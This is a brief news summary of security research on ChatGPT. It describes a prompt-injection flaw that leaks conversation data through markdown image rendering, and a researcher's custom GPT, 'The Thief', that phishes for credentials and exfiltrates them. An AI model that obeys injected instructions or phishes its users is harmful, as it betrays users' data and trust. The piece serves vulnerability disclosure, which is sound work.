December 22, 2023 at 05:39AM
Researchers discovered a vulnerability in ChatGPT, which could be exploited to steal sensitive information by injecting malicious content through image markdown rendering. OpenAI addressed the issue partially for the web application but not for mobile apps. Additionally, a custom GPT named ‘The Thief’ was created to phish for user credentials and exfiltrate data to an external server.
Key takeaways from the meeting notes:
– Researchers discovered a vulnerability in ChatGPT involving prompt injection attack using markdown images, allowing attackers to steal sensitive information from users’ conversations.
– OpenAI was informed about the attack method but did not plan to address it initially. However, they have recently started taking steps to mitigate the issue in the web application, with ongoing efforts to improve security.
– Plus and Enterprise users of ChatGPT were given the ability to create custom GPTs, and a researcher created a malicious GPT named ‘The Thief’ that phishes for user credentials and exfiltrates the stolen data to an external server.
– The researcher demonstrated how such a malicious GPT could potentially be published on the official GPTStore, prompting OpenAI to implement safeguards against the publishing of obviously malicious GPTs.
These key takeaways summarize the security research findings and OpenAI’s response to the identified vulnerabilities.